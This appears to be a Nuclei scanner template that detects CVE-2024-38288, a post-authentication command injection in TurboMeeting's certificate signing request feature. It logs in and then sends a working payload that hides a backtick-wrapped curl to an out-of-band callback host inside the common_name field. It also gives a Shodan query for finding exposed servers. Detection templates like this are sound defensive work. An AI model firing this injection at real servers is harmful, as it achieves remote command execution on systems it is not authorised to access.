77 lines
2.4 KiB
YAML
77 lines
2.4 KiB
YAML
id: CVE-2024-38288
|
|
|
|
info:
|
|
name: TurboMeeting - Post-Authentication Command Injection
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: high
|
|
description: |
|
|
The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
|
|
reference:
|
|
- https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
|
|
- https://www.rhubcom.com/v5/manuals.html
|
|
classification:
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09357
|
|
cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: html:"TurboMeeting"
|
|
product: turbomeeting
|
|
vendor: rhubcom
|
|
tags: cve,cve2024,rce,turbomeeting,authenticated
|
|
|
|
variables:
|
|
username: "{{username}}"
|
|
password: "{{password}}"
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /as/wapi/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "as/wapi/profile_entry?sid="
|
|
internal: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: sid
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- 'sid=(.*?)"'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
POST /as/wapi/generate_csr HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- CSR
|
|
- SSL
|
|
condition: and
|
|
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "dns"
|
|
# digest: 4b0a00483046022100b7150bb57a627680934fe1e82ebabd6e83339ee4b2fbfcd6ad3bc450bb569c9202210087a7802c4515ba8d69582af86b9e3e021e5f495872ab33d997bca0f78a9f12c8:922c64590222798bb761d5b6d8e72950 |